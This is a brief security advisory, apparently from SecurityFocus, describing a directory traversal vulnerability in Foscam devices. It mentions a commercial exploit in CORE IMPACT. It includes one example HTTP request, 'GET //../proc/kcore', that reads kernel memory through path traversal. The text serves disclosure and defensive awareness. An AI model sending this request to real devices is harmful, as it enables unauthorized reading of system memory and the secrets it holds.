Foscam Prior to Directory Traversal Vulnerability

An attacker can use readily available tools to exploit this issue.

The following example is available:

GET //../proc/kcore HTTP/1.0

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


Privacy Statement
Copyright 2010, SecurityFocus